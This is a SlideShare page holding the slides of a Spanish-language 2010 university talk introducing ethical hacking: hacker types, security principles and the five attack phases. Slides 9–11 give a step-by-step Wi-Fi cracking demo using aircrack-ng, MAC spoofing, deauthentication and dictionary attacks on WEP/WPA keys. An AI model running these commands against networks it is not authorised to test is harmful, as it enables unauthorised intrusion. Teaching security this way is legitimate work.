Introduccion al Ethical Hacking

3,495 views
3,372 views

Published on

Introduccion al Ethical Hacking

Published in: Education
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
3,495
On SlideShare
0
From Embeds
0
Number of Embeds
19
Actions
Shares
0
Downloads
184
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Introduccion al Ethical Hacking

  1. 1. Universidad Tecnológica del Sur de Sonora Seguridad Informática y Ethical HackingeXpLoDNoviembre 2010
  2. 2. DisclaimerTodos los contenidos, actividades y aplicaciones(software) mostrados en esta conferencia son con fines100% educativos, por lo cual los expositores einstitución educativa que los imparten se deslindan decualquier responsabilidad que los participantes pudieranadquirir por el mal uso de estos.
  3. 3. Hacking ÉticoEl nombre hacker – neologismo utilizado para referirsea un experto (Gurú) en varias o alguna rama técnicarelacionada con las tecnologías de la información y lastelecomunicaciones: programación, redes, sistemasoperativos.Cracker – (criminal hacker, 1985). Un cracker esalguienque viola la seguridad de un sistema informático deforma similar a como lo haría un hacker, sólo que adiferencia de este último, el cracker realiza la intrusióncon fines de beneficio personal o para hacer daño a suobjetivo.
  4. 4. Hacking ÉticoHacker ético – profesionales de la seguridad queaplican sus conocimientos de hacking con finesdefensivos (y legales).Ethical Hacking es una disciplina de la seguridadinformática que se sustenta en que la mejor forma deevaluar las amenazas que representan los llamados“hackers” o piratas de la información es conocer cómoactúan y operan.
  5. 5. Elementos esenciales de la seguridad.Confidencialidad – tiene que ver con la ocultación deinformación o recursos.Autenticidad - es la identificación y garantía del origende la información.Integridad - Se refiere a cambios no autorizados en losdatos.Disponibilidad – Posibilidad de hacer uso de lainformación y recursos deseados.
  6. 6. Hacking Ético1- Reconocimiento • Pasivo2- Rastreo (escaneo) • Activo3- Acceso • Sistema operativo/aplicación • Redes • Denegación de servicio4- Mantener el acceso5- Borrado de huellas
  7. 7. Tipos de Hacker- Black hats• Individuals with extraordinary computing skills,resorting to malicious or destructive activities. Alsoknown as „Crackers.‟- White Hats• Individuals professing hacker skills and using them fordefensive purposes. Also known as „Security Analysts‟.- Gray Hats• Individuals who work both offensively and defensivelyat various times.
  8. 8. Perfil de habilidades de unhacker ético Experto en algún campo de la informática. Conocimientos profundos de diversas plataformas (Windows, Unix, Linux). Conocimientos de redes. Conocimientos de hardware y software.
  9. 9. DEMO “Cracking WirelessPasswords“ sudo apt-get install aircrack-ng sudo apt-get install macchanger sudo airmon-ng start wlan0 sudo ifconfig mon0 down sudo macchanger -m 00:11:22:33:44:55 mon0 sudo ifconfig mon0 up sudo airodump-ng mon0
  10. 10. DEMO “Cracking Wireless Passwords“control + csudo airodump-ng -c [# canal] -w [nombre red] --bssid [direccion MAC] mon0PARA WEPsudo aireplay-ng -1 6000 -a [direccion MAC] -h 00:11:22:33:44:55 mon0PARA WPAsudo aireplay-ng -0 1 -a [direccion MAC] -c [STATION] mon0PARA WEPsudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [direccion MAC] -h 00:11:22:33:44:55 mon0PARA WPAsudo aircrack-ng -w [/directorio/del/diccionario.lst] [NOMBRE]*.cap
  11. 11. DEMO “Cracking Wireless Passwords“PARA WEPsudo aircrack-ng -z [nombre red]*.capEsperaremos a que finalice la captura de los paquetes y a su vez el crackeo de losmismos, hasta que se nos muestre la clave de la red.
  12. 12. Fase #1:Reconocimiento
  13. 13. The Dude
  14. 14. Fase #2:Rastreo (Escaneo)
  15. 15. Nmap y SuperScan
  16. 16. Fase #3:Acceso
  17. 17. Exploits y Spoofing
  18. 18. Fase #4:Mantener el Acceso
  19. 19. Remote Copy PasteAttack DEMO
  20. 20. Fase #5:Borrado de Huellas(A veces nonecesario)
  21. 21. Conclusiones La seguridad computacional como un todo. El elemento humano dentro de la seguridad computacional. El establecimiento de reglas para un mejor nivel de seguridad. Necesidad de profesionistas calificados para estos trabajos. Gran amplitud de herramientas OpenSource. Compromiso social y ético para sistemas. Innovación diaria.
  22. 22. Preguntas y Respuestas
  23. 23. Contacto
  24. 24. Gracias ¡¡

×